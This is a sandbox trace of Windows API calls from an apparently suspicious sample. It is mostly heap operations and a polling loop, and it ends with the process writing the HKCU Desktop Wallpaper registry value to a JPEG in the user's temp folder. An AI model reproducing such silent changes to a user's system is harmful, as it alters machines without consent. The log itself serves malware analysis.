RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0228.128] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0228.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0228.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eadf0 [0228.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0228.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0228.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0228.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0228.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0228.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0228.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0228.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0228.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0228.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0228.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0228.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0228.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0228.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0228.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0228.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eadf0 | out: hHeap=0x2af0000) returned 1 [0228.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0228.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0228.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0228.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0228.129] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0228.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0228.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0228.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0228.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0228.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0228.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0228.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0228.129] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0228.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0228.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0228.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0228.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0228.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0228.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0228.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0228.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0228.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0228.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0228.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0228.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0228.130] timeGetTime () returned 0x117907b [0228.130] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.130] Sleep (dwMilliseconds=0xa) [0228.149] timeGetTime () returned 0x117909a [0228.149] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.149] Sleep (dwMilliseconds=0xa) [0228.165] timeGetTime () returned 0x11790a9 [0228.165] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.165] Sleep (dwMilliseconds=0xa) [0228.180] timeGetTime () returned 0x11790b9 [0228.180] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.180] Sleep (dwMilliseconds=0xa) [0228.197] timeGetTime () returned 0x11790c9 [0228.197] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.197] Sleep (dwMilliseconds=0xa) [0228.213] timeGetTime () returned 0x11790d8 [0228.213] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.213] Sleep (dwMilliseconds=0xa) [0228.227] timeGetTime () returned 0x11790e8 [0228.227] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.227] Sleep (dwMilliseconds=0xa) [0228.385] timeGetTime () returned 0x1179184 [0228.385] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.385] Sleep (dwMilliseconds=0xa) [0228.399] timeGetTime () returned 0x1179194 [0228.399] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.399] Sleep (dwMilliseconds=0xa) [0228.414] timeGetTime () returned 0x11791a3 [0228.415] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.415] Sleep (dwMilliseconds=0xa) [0228.430] timeGetTime () returned 0x11791b3 [0228.430] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.430] Sleep (dwMilliseconds=0xa) [0228.446] timeGetTime () returned 0x11791c3 [0228.446] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.446] Sleep (dwMilliseconds=0xa) [0228.473] timeGetTime () returned 0x11791de [0228.473] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.473] Sleep (dwMilliseconds=0xa) [0228.490] timeGetTime () returned 0x11791ed [0228.490] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.490] Sleep (dwMilliseconds=0xa) [0228.516] timeGetTime () returned 0x11791fd [0228.516] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.517] Sleep (dwMilliseconds=0xa) [0228.536] timeGetTime () returned 0x117921c [0228.536] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.536] Sleep (dwMilliseconds=0xa) [0228.552] timeGetTime () returned 0x117922c [0228.552] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.552] Sleep (dwMilliseconds=0xa) [0228.567] timeGetTime () returned 0x117923c [0228.567] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.567] Sleep (dwMilliseconds=0xa) [0228.584] timeGetTime () returned 0x117924b [0228.584] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.584] Sleep (dwMilliseconds=0xa) [0228.628] timeGetTime () returned 0x117926a [0228.628] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.628] Sleep (dwMilliseconds=0xa) [0228.645] timeGetTime () returned 0x117928a [0228.645] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.645] Sleep (dwMilliseconds=0xa) [0228.669] timeGetTime () returned 0x1179299 [0228.669] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.669] Sleep (dwMilliseconds=0xa) [0228.692] timeGetTime () returned 0x11792b9 [0228.692] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.692] Sleep (dwMilliseconds=0xa) [0228.707] timeGetTime () returned 0x11792c8 [0228.707] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.707] Sleep (dwMilliseconds=0xa) [0228.723] timeGetTime () returned 0x11792d8 [0228.723] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.723] Sleep (dwMilliseconds=0xa) [0228.740] timeGetTime () returned 0x11792e7 [0228.740] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.740] Sleep (dwMilliseconds=0xa) [0228.754] timeGetTime () returned 0x11792f7 [0228.754] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.754] Sleep (dwMilliseconds=0xa) [0228.770] timeGetTime () returned 0x1179307 [0228.770] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.770] Sleep (dwMilliseconds=0xa) [0228.791] timeGetTime () returned 0x1179316 [0228.791] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.791] Sleep (dwMilliseconds=0xa) [0228.821] timeGetTime () returned 0x1179336 [0228.821] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.821] Sleep (dwMilliseconds=0xa) [0228.832] timeGetTime () returned 0x1179345 [0228.832] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.832] Sleep (dwMilliseconds=0xa) [0228.848] timeGetTime () returned 0x1179355 [0228.848] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.848] Sleep (dwMilliseconds=0xa) [0228.863] timeGetTime () returned 0x1179364 [0228.863] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.863] Sleep (dwMilliseconds=0xa) [0228.879] timeGetTime () returned 0x1179374 [0228.879] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0228.880] TranslateMessage (lpMsg=0x8cf798) returned 0 [0228.880] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0228.880] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0228.880] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0228.880] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.880] Sleep (dwMilliseconds=0xa) [0228.895] timeGetTime () returned 0x1179384 [0228.895] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.895] Sleep (dwMilliseconds=0xa) [0228.911] timeGetTime () returned 0x1179393 [0228.911] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.911] Sleep (dwMilliseconds=0xa) [0228.926] timeGetTime () returned 0x11793a3 [0228.926] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.926] Sleep (dwMilliseconds=0xa) [0228.941] timeGetTime () returned 0x11793b2 [0228.941] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.941] Sleep (dwMilliseconds=0xa) [0228.957] timeGetTime () returned 0x11793c2 [0228.957] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.958] Sleep (dwMilliseconds=0xa) [0228.973] timeGetTime () returned 0x11793d2 [0228.974] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.974] Sleep (dwMilliseconds=0xa) [0228.989] timeGetTime () returned 0x11793e1 [0228.989] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0228.989] Sleep (dwMilliseconds=0xa) [0229.004] timeGetTime () returned 0x11793f1 [0229.004] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.004] Sleep (dwMilliseconds=0xa) [0229.020] timeGetTime () returned 0x1179401 [0229.020] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.020] Sleep (dwMilliseconds=0xa) [0229.035] timeGetTime () returned 0x1179410 [0229.035] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0229.035] Sleep (dwMilliseconds=0xa) [0229.165] timeGetTime () returned 0x117948d [0229.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0229.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0229.165] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0229.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0229.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0229.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0229.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0229.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0229.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0229.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0229.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0229.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0229.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0229.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0229.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0229.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0229.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0229.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0229.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0229.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0229.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0229.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0229.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0229.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0229.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0229.166] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0229.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0229.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0229.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab488 [0229.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0229.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0229.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0229.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0229.166] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0229.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0229.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eabe0 [0229.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0229.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0229.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0229.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0229.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0229.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0229.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0229.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0229.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0229.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0229.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0229.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0229.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0229.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0229.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0229.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eabe0 | out: hHeap=0x2af0000) returned 1 [0229.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0229.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0229.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0229.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0229.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0229.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0229.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0229.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0229.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0229.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0229.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0229.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0229.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0229.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73370 [0229.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0229.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0229.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0229.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0229.168] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0229.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0229.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0229.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0229.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0229.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0229.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0229.168] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x4e0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0229.168] RegSetValueExW (in: hKey=0x4e0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0229.168] RegCloseKey (hKey=0x4e0) returned 0x0 [0229.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73370 | out: hHeap=0x2af0000) returned 1 [0229.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0229.168] 